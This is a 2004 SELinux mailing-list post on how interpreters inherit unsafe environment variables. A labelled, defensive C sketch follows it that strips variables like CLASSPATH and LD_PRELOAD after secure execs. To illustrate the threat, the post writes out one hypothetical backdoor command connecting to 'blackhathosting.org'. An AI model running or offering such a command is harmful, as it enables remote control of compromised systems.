SELinux and the Desktop
Steve Coleman
23e9t5t02 at sneakemail.com
Thu Oct 14 17:56:57 UTC 2004
Colin Walters walters-at-redhat.com |fedora| wrote:
>The major threat here is environment variables, right?
>
That one is a minor issue in my book, but certainly worth trying to
enforce in some way.
>I wonder what all
>would break if we changed e.g. bash and python to by default clean
>the environment before executing the script if it was executed from a
>domain transition
>
Could be a lot. If you sanitize classpath or PERL5LIB a lot could break,
but if you don't you might not be running what you think you are, which
leads back to what I was inquiring about.
So just to clarify, what's the difference between a user running a script
file that does exec "java ./MyClass.class" and a stack overrun causing a
browser with a smashed stack to save a MyBackdoor.class to the local
file system and execing "java ./MyBackdoor.class -irc
blackhathosting.org"?
In both cases it's the same user, and in both cases it's the same java VM
binary. The java binary is likely the only process that knows enough to
enforce anything here based on when, what, and where things are run by
the user. The browser may try to limit what permissions are passed to
the exec call but with a smashed stack overrun can you trust it to? Not
me, at least not yet. This looks to me like the java VM needs to be
hacked with the SELinux API in order to have any confidence in it, but
in some ways that duplicates the java security manager's role in life.
Perhaps we just need a specialized Java security manager, perhaps much
more. Dunno. But it's a common issue with desktop actions and shells, as
well as Perl, Python, Ruby, just pick your poison...
I guess what I was looking for was a philosophy for how to handle this
nebulous issue. The more likely answer is each has its own issues and
must be dealt with separately in its own special way and must be changed
to deal with SE. I am hoping for a better option as there is much in SE
I don't know yet and I do want to understand it in great detail some way
down the road.
Thanks.
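
Added example, not part of the original message or of any project's code: a sketch of the "clean the environment on a domain transition" idea raised in the quoted question. It assumes the kernel marks such an exec with AT_SECURE in the auxiliary vector (which SELinux does unless policy grants noatsecure); the variable list and the launcher in main() are illustrative assumptions.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/auxv.h>

/* Variables that change which code an interpreter loads (illustrative list). */
static const char *const unsafe_vars[] = {
    "CLASSPATH", "PERL5LIB", "PERLLIB", "PYTHONPATH", "RUBYLIB",
    "LD_PRELOAD", "LD_LIBRARY_PATH", NULL
};

/* True if entry "NAME=value" names exactly one of the unsafe variables. */
static int is_unsafe(const char *entry)
{
    for (size_t i = 0; unsafe_vars[i]; i++) {
        size_t n = strlen(unsafe_vars[i]);
        if (strncmp(entry, unsafe_vars[i], n) == 0 && entry[n] == '=')
            return 1;
    }
    return 0;
}

/* Compact envp in place, dropping unsafe entries when secure != 0.
 * Returns the number of entries removed. */
size_t scrub_env(char **envp, int secure)
{
    size_t kept = 0, dropped = 0;
    if (!secure)
        return 0;
    for (size_t i = 0; envp[i]; i++) {
        if (is_unsafe(envp[i]))
            dropped++;
        else
            envp[kept++] = envp[i];
    }
    envp[kept] = NULL;
    return dropped;
}

/* Hypothetical launcher: scrub only after a secure exec, then run the interpreter. */
int main(int argc, char **argv)
{
    extern char **environ;
    int secure = getauxval(AT_SECURE) != 0;
    size_t n = scrub_env(environ, secure);
    fprintf(stderr, "AT_SECURE=%d, removed %zu variable(s)\n", secure, n);
    if (argc > 1) { execvp(argv[1], argv + 1); perror("execvp"); return 127; }
    return 0;
}
```

As the reply above notes, anything that legitimately depends on CLASSPATH or PERL5LIB stops working once these are stripped, so the list is a policy decision rather than a fixed set.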